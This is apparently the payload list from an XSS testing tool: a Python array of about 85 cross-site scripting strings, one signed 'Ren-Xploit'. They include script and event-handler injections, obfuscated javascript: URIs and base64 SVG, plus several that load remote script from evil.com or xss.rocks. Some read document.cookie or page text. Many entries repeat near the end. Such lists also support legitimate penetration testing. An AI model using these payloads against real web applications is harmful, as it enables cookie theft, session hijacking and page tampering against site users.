payloads = [

    '"><img src=x onerror="confirm(`------XSS By Ren-Xploit------\nSystem::\n- Domain: ${document.domain}\n- ReadyState: ${document.readyState}\n- InputEncoding: ${document.inputEncoding}\n- Title: ${document.title}\n- TextContent: ${document.body.textContent}\n- Protocol: ${location.protocol}\n- LastModified: ${document.lastModified}`)">',
    "<script>alert('XSS')</script>",
    "'\"><script>alert('XSS')</script>",
    "<img src=x onerror=alert('XSS')>",
    "<svg onload=alert('XSS')>",
    "<body onload=alert('XSS')>",
    "<iframe src='javascript:alert(\"XSS\")'></iframe>",
    "<math><mi xlink:href='javascript:alert(\"XSS\")'>",
    "<object data='javascript:alert(\"XSS\")'></object>",
    "<embed src='javascript:alert(\"XSS\")'></embed>",
    "<link rel='stylesheet' href='javascript:alert(\"XSS\")'>",
    "<meta http-equiv='refresh' content='0;url=javascript:alert(\"XSS\")'>",
    "<div style=\"background-image: url(javascript:alert('XSS'))\">",
    "<img src onerror=alert('XSS')>",
    "<img src=1 onerror=alert('XSS')>",
    "<svg/onload=alert('XSS')>",
    "<script>alert(`XSS`)</script>",
    "<script>alert(String.fromCharCode(88,83,83))</script>",
    "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
    "<SCRIPT/XSS SRC=\"http://evil.com/xss.js\"></SCRIPT>",
    "<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">",
    "<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">",
    "<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">",
    "<IMG SRC=java\\0script:alert('XSS')>",
    "<IMG SRC=jav&#x0D;ascript:alert('XSS')>",
    "<IMG SRC=\"JavaScript:alert('XSS')\">",
    "<BODY BACKGROUND=\"javascript:alert('XSS')\">",
    "<IMG DYNSRC=\"javascript:alert('XSS')\">",
    "<IMG LOWSRC=\"javascript:alert('XSS')\">",
    "<BASE HREF=\"javascript:alert('XSS');//\">",
    "<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">",
    "<STYLE>BODY{-moz-binding:url(\"http://evil.com/xss.xml#xss\")}</STYLE>",
    "<STYLE>@import'javascript:alert(\"XSS\")';</STYLE>",
    "<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://evil.com/xss.sct\"></OBJECT>",
    "<IMG SRC=# onmouseover=\"alert('XSS')\">",
    "<DIV STYLE=\"width: expression(alert('XSS'));\">",
    "<IMG SRC=\"data:image/svg+xml;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoWFNTKSI+\"/>",
    "<SVG><SCRIPT>alert('XSS')</SCRIPT></SVG>",
    "<FORM><INPUT TYPE=\"submit\" VALUE=\"XSS\" ONCLICK=\"alert('XSS');\"></FORM>",
    "<IMG SRC=\"http://www.example.com/image.jpg\" ONERROR=\"alert('XSS')\">",
    "<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">",
    "<BODY ONLOAD=alert('XSS')>",
    "<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>",
    "<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>",
    "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;URL=javascript:alert('XSS');\">",
    "<OBJECT TYPE=\"text/html\" DATA=\"javascript:alert('XSS');\"></OBJECT>",
    "<EMBED SRC=\"javascript:alert('XSS');\"></EMBED>",
    "<XML ID=\"xss\"><I><B><IMG SRC=\"jAvAsCrIpT:alert('XSS')\"></B></I></XML>",
    "<MARQUEE ONSTART=alert('XSS')></MARQUEE>",
    "<IMG STYLE=\"xss:expr(alert('XSS'))\">",
    "<STYLE>body {background-image: url(\"javascript:alert('XSS')\");}</STYLE>",
    "<SCRIPT>confirm('XSS')</SCRIPT>",
    "<SCRIPT>alert(document.cookie)</SCRIPT>",
    "<SCRIPT>alert(window.location)</SCRIPT>",
    "<SCRIPT>alert(navigator.userAgent)</SCRIPT>",
    "<SCRIPT>alert(location.href)</SCRIPT>",
    "<IMG SRC=\"javascript:alert(String.fromCharCode(88,83,83))\">",
    "<IMG SRC='javascript:alert(\"XSS\")'>",
    "<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS')\">",
    "<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>",
    "<SCRIPT SRC=//xss.rocks/xss.js></SCRIPT>",
    "<IMG SRC=//xss.rocks/xss.jpg ONERROR=alert('XSS')>",
    "<IMG SRC=JaVaScRiPt:alert('XSS')>",
    "<SCRIPT>var a='XSS';alert(a);</SCRIPT>",
    "<SCRIPT>var a=location;alert(a);</SCRIPT>",
    "<SCRIPT>var a=navigator;alert(a);</SCRIPT>",
    "<SCRIPT>var a=document;alert(a);</SCRIPT>",
    "<IMG SRC='jav&#x09;ascript:alert(\"XSS\")'>",
    "<IMG SRC='jav&#x0A;ascript:alert(\"XSS\")'>",
    "<IMG SRC='jav&#x0D;ascript:alert(\"XSS\")'>",
    "<IMG SRC=java\\0script:alert('XSS')>",
    "<IMG SRC=\"data:image/svg+xml;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoWFNTKSI+\">",
    "<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>",
    "<MARQUEE ONSTART=alert('XSS')></MARQUEE>",
    "<DIV STYLE=\"width: expression(alert('XSS'));\">",
    "<SCRIPT>alert('XSS')</SCRIPT>",
    "<IMG SRC=javascript:alert('XSS')>",
    "<SCRIPT>alert('XSS')</SCRIPT>",
    "<IMG SRC=\"javascript:alert('XSS')\">",
    "<SCRIPT>alert('XSS')</SCRIPT>",
    "<IMG SRC=\"javascript:alert('XSS')\">",
    "<IMG SRC=javascript:alert('XSS')>",
    "<IMG SRC=\"javascript:alert('XSS')\">",
    "<IMG SRC=javascript:alert('XSS')>"
]
